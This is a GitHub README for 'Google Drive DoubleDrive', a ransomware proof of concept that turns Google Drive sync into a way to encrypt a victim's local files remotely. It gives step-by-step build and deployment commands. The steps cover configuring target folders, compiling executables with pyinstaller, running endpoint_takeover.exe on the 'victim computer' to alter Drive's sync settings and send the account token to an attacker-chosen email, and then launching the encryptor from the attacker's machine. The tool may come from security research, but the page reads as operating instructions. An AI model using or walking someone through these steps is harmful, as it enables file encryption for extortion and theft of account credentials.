Skip to content

Latest commit

 

History

History
23 lines (22 loc) · 1.47 KB

File metadata and controls

23 lines (22 loc) · 1.47 KB

Google Drive DoubleDrive

A DoubleDrive variant that uses Google Drive to encrypt local files remotely.

How to use

  1. Make sure you clone the DoubleDrive repo and install the DoubleDrive python package. If you are currently in the google_drive_doubledrive folder then run:
pip install ../
  1. Use config_setup.py to setup the exact configuration you want for the ransomware. For example:
python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop
  1. While you are in the google_drive_doubledrive folder, run:
pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\google_drive_doubledrive.py
  1. A folder named dist will be created. Inside you can find endpoint_takeover.exe and google_drive_doubledrive.exe
  2. Transfer endpoint_takeover.exe to the victim computer and run it. This will change Google Drive's settings database to sync the target paths to encrypt. It will also extract the token of the currently logged in Google Drive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage.

Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time.

  1. On the attacker's computer, execute:
google_drive_doubledrive.exe